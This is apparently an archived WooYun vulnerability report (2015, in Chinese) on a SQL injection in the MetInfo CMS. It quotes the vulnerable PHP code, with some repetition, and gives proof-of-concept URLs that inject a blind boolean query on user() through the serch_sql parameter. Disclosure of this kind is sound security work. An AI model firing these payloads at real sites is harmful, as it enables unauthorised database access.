Metinfo最新版一处注入及一个小问题

发表于 2015年07月09日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0125648

漏洞标题：Metinfo最新版一处注入及一个小问题

漏洞详情

披露状态：

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商已经确认，细节仅向厂商公开
2015-07-15: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述：

详细说明：

metinfo最新版1、注入漏洞文件:/include/global/listmod.php截取关键代码

require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';<br>
require_once '../include/global/pseudo.php';<br>
if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}<br>
if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)||$class1==10001){<br>
	if($search=="search"){<br>
		$search_module=$imgproduct=='product'?3:5;<br>
		if($searchtype)$search_module=$searchtype;<br>
		$query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";<br>
		$search_coloumn=$db->get_all($query);<br>
		$class1=$search_coloumn[0]['id'];<br>
	}else{<br>
		if($imgproduct){<br>
			$ipmd = $imgproduct=='product'?100:101;<br>
			if($imgproduct=='product'){$class1=$productlistid;}<br>
			else{$class1=$imglistid;}<br>
		}<br>
	}<br>
}<br>
else{<br>
	if(!$class1){<br>
		if(!$class2){$class2=$class_list[$class3]['bigclass'];}<br>
		$class1=$class_list[$class2]['bigclass'];<br>
	}<br>
}<br>
if($met_member_use){<br>
	$classaccess=$class3?$class3:($class2?$class2:$class1);<br>
	$classaccess= $db->get_one("SELECT * FROM $met_column WHERE id='$classaccess'");<br>
	$metaccess=$classaccess['access'];<br>
}<br>
require_once '../include/head.php';<br>
if($class1){if(!is_array($class_list[$class1]))okinfo('../404.html');}<br>
$pseudos=$db->get_one("select * from $met_column where filename='$class2' and lang='$lang'");<br>
if($pseudos){<br>
$class2=$pseudos[id];<br>
}......$class1_info=$class_list[$class1]['releclass']?$class_list[$class_list[$class1]['releclass']]:$class_list[$class1];<br>
$class2_info=$class_list[$class1]['releclass']?$class_list[$class1]:$class_list[$class2];<br>
$class3_info=$class_list[$class1]['releclass']?$class_list[$class2]:$class_list[$class3];<br>
if(!is_array($class1_info))okinfo('../404.html');<br>
$class1sql=" class1='$class1' ";<br>
if($class1&&!$class2&&!$class3){<br>
	foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){<br>
		if($val['releclass']==$class1){<br>
			$class1re.=" or class1='$val[id]' ";<br>
		}<br>
	}<br>
	if($class1re){<br>
		$class1sql='('.$class1sql.$class1re.')';<br>
	}<br>
}<br>
if($imgproduct){<br>
	$ipcom = $imgproduct=='product'?$productcom:$imgcom;<br>
	$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";<br>
	if($ipcom=='com')$serch_sql .= " and com_ok=1";<br>
    if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){<br>
		$serch_sql .= ' and (('.$class1sql;<br>
	}else{<br>
		$serch_sql .= ' and ((1=1';<br>
	}<br>
}else{<br>
	$serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')  and (( $class1sql ";<br>
}

require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';

require_once '../include/global/pseudo.php';

if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}

if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)||$class1==10001){

if($search=="search"){

$search_module=$imgproduct=='product'?3:5;

if($searchtype)$search_module=$searchtype;

$query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";

$search_coloumn=$db->get_all($query);

$class1=$search_coloumn[0]['id'];

}else{

if($imgproduct){

$ipmd = $imgproduct=='product'?100:101;

if($imgproduct=='product'){$class1=$productlistid;}

else{$class1=$imglistid;}

}

else{

if(!$class1){

if(!$class2){$class2=$class_list[$class3]['bigclass'];}

$class1=$class_list[$class2]['bigclass'];

}

if($met_member_use){

$classaccess=$class3?$class3:($class2?$class2:$class1);

$classaccess= $db->get_one("SELECT * FROM $met_column WHERE id='$classaccess'");

$metaccess=$classaccess['access'];

}

require_once '../include/head.php';

if($class1){if(!is_array($class_list[$class1]))okinfo('../404.html');}

$pseudos=$db->get_one("select * from $met_column where filename='$class2' and lang='$lang'");

if($pseudos){

$class2=$pseudos[id];

}......$class1_info=$class_list[$class1]['releclass']?$class_list[$class_list[$class1]['releclass']]:$class_list[$class1];

$class2_info=$class_list[$class1]['releclass']?$class_list[$class1]:$class_list[$class2];

$class3_info=$class_list[$class1]['releclass']?$class_list[$class2]:$class_list[$class3];

if(!is_array($class1_info))okinfo('../404.html');

$class1sql=" class1='$class1' ";

if($class1&&!$class2&&!$class3){

foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){

if($val['releclass']==$class1){

$class1re.=" or class1='$val[id]' ";

}

if($class1re){

$class1sql='('.$class1sql.$class1re.')';

}

if($imgproduct){

$ipcom = $imgproduct=='product'?$productcom:$imgcom;

$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";

if($ipcom=='com')$serch_sql .= " and com_ok=1";

if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){

$serch_sql .= ' and (('.$class1sql;

}else{

$serch_sql .= ' and ((1=1';

}

}else{

$serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";

}

if($imgproduct){<br>
	$ipcom = $imgproduct=='product'?$productcom:$imgcom;<br>
	$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";<br>
	if($ipcom=='com')$serch_sql .= " and com_ok=1";<br>
    if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){<br>
		$serch_sql .= ' and (('.$class1sql;<br>
	}else{<br>
		$serch_sql .= ' and ((1=1';<br>
	}<br>
}else{<br>
	$serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')  and (( $class1sql ";<br>
}

if($imgproduct){

$ipcom = $imgproduct=='product'?$productcom:$imgcom;

$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";

if($ipcom=='com')$serch_sql .= " and com_ok=1";

if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){

$serch_sql .= ' and (('.$class1sql;

}else{

$serch_sql .= ' and ((1=1';

}

}else{

$serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";

}

$serch_sql之前在这段代码前包括后面调用这个文件的文件都没声明所以第一次声明是在下列代码但是if语句中的 $serch_sql是 $serch_sql .= 这类形式的

if($imgproduct){<br>
	$ipcom = $imgproduct=='product'?$productcom:$imgcom;<br>
	$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";

if($imgproduct){

$ipcom = $imgproduct=='product'?$productcom:$imgcom;

$serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";

导致可以直接控制$serch_sql参数啦在之后

$total_count = $db->counter($dbname, "$serch_sql", "*");

1	$total_count = $db->counter($dbname, "$serch_sql", "*");

进入查询但是前面有一些条件所以我们需要调用这个文件才行$imgproduct需满足所以调用/img/img.php这个文件证明:我们在赋值之后打印出来看仔细点

可以控制**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=114,1,2%29%23

**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=115,1,2%29%23

漏洞证明：

另一个小问题/wap/module.php

switch($module){<br>
	default:<br>
		$temp = 'index';<br>
		$waptitle=$wap_title;<br>
		break;<br>
	case 1:<br>
		$temp = 'show';<br>
		$dbname = $met_column;<br>
		break;<br>
	case 2:<br>
		$temp = 'news';<br>
		$dbname = $met_news;<br>
		$list_num = $wap_news_list;<br>
		break;<br>
	case 3:<br>
		$temp = 'product';<br>
		$dbname = $met_product;<br>
		$list_num = $wap_product_list;<br>
		break;<br>
	case 4:<br>
		$temp = 'download';<br>
		$dbname = $met_download;<br>
		$list_num = $wap_download_list;<br>
		break;<br>
	case 5:<br>
		$temp = 'img';<br>
		$dbname = $met_img;<br>
		$list_num = $wap_img_list;<br>
		break;<br>
	case 6:<br>
		$temp = 'job';<br>
		$dbname = $met_job;<br>
		$list_num = $wap_job_list;<br>
		break;<br>
}<br>
if($temp != 'index'){<br>
$ctitle = $db->get_one("select * from $dbname where lang='$lang' and id = '$id'");<br>
if(!$id){<br>
	$clname = $class1?'class1':($class2?'class2':'class3');<br>
	$classwap = $class1?$class1:($class2?$class2:$class3);<br>
	$qtext = $met_wap_ok?"and wap_ok='1'":'';<br>
	$serch_sql=" where lang='$lang' and $clname = '$classwap' $qtext";<br>
	if($module==6)$serch_sql=" where lang='$lang' $qtext";<br>
	$order_sql=$class3?list_order($class_list[$class3]['list_order']):($class2?list_order($class_list[$class2]['list_order']):list_order($class_list[$class1]['list_order']));<br>
	if($module==6)$order_sql='order by no_order desc,addtime desc';<br>
	$total_count = $db->counter($dbname, "$serch_sql", "*");<br>
	$totaltop_count = $db->counter($dbname, "$serch_sql and top_ok='1'", "*");<br>
	require_once '../include/pager.class.php';<br>
    $page = (int)$page;<br>
	if($page_input){$page=$page_input;}<br>
    $rowset = new Pager($total_count,$list_num,$page);<br>
    $from_record = $rowset->_offset();<br>
	$page = $page?$page:1;<br>
	if($module==6){<br>
		$query = "SELECT * FROM $dbname $serch_sql and access='0' $order_sql LIMIT $from_record, $list_num";<br>
	}else{<br>
		$query = "SELECT * FROM $dbname $serch_sql and top_ok='1' and access='0' and (recycle='0' or recycle='-1') $order_sql LIMIT $from_record, $list_num";<br>
	}

switch($module){

default:

$temp = 'index';

$waptitle=$wap_title;

break;

case 1:

$temp = 'show';

$dbname = $met_column;

break;

case 2:

$temp = 'news';

$dbname = $met_news;

$list_num = $wap_news_list;

break;

case 3:

$temp = 'product';

$dbname = $met_product;

$list_num = $wap_product_list;

break;

case 4:

$temp = 'download';

$dbname = $met_download;

$list_num = $wap_download_list;

break;

case 5:

$temp = 'img';

$dbname = $met_img;

$list_num = $wap_img_list;

break;

case 6:

$temp = 'job';

$dbname = $met_job;

$list_num = $wap_job_list;

break;

}

if($temp != 'index'){

$ctitle = $db->get_one("select * from $dbname where lang='$lang' and id = '$id'");

if(!$id){

$clname = $class1?'class1':($class2?'class2':'class3');

$classwap = $class1?$class1:($class2?$class2:$class3);

$qtext = $met_wap_ok?"and wap_ok='1'":'';

$serch_sql=" where lang='$lang' and $clname = '$classwap' $qtext";

if($module==6)$serch_sql=" where lang='$lang' $qtext";

$order_sql=$class3?list_order($class_list[$class3]['list_order']):($class2?list_order($class_list[$class2]['list_order']):list_order($class_list[$class1]['list_order']));

if($module==6)$order_sql='order by no_order desc,addtime desc';

$total_count = $db->counter($dbname, "$serch_sql", "*");

$totaltop_count = $db->counter($dbname, "$serch_sql and top_ok='1'", "*");

require_once '../include/pager.class.php';

$page = (int)$page;

if($page_input){$page=$page_input;}

$rowset = new Pager($total_count,$list_num,$page);

$from_record = $rowset->_offset();

$page = $page?$page:1;

if($module==6){

$query = "SELECT * FROM $dbname $serch_sql and access='0' $order_sql LIMIT $from_record, $list_num";

}else{

$query = "SELECT * FROM $dbname $serch_sql and top_ok='1' and access='0' and (recycle='0' or recycle='-1') $order_sql LIMIT $from_record, $list_num";

}

$list_num参数如果进入case 1 就可以控制

本以为是个limit注入

在这个表中根本没这些字段...

修复方案：

过滤

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-07-1213:08

厂商回复：

是系统漏洞，后续版本修复。

评价

2010-01-01 00:00 answer 白帽子 | Rank:370 漏洞数:31)
牛逼
2010-01-01 00:00 無名老人白帽子 | Rank:10 漏洞数:1)
看来你已经拿到源码开始审计了啊，今天拿到份5.2 的源码。正准备搞呢。。
2010-01-01 00:00 玉林嘎白帽子 | Rank:757 漏洞数:64)
通用的速度感动啊！
2010-01-01 00:00 牛肉包子白帽子 | Rank:190 漏洞数:17)
2K？
2010-01-01 00:00 玉林嘎白帽子 | Rank:757 漏洞数:64)
@牛肉包子嗯
2010-01-01 00:00 Cheery 白帽子 | Rank:10 漏洞数:1)
大牛带我飞
2010-01-01 00:00 黑暗游侠白帽子 | Rank:1058 漏洞数:93)
玉总带我飞好么
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)
@玉林嘎带我飞⊙﹏⊙
2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)
求带飞
2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)
http://wooyun.org/bugs/wooyun-2010-0119166 跟这个一模一样的
2010-01-01 00:00 玉林嘎白帽子 | Rank:757 漏洞数:64)
@menmen519 我看到你那个公开之后发现差不多的问题就是入口不一样而已
2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)
@玉林嘎哦呵呵反正2k到手哈哈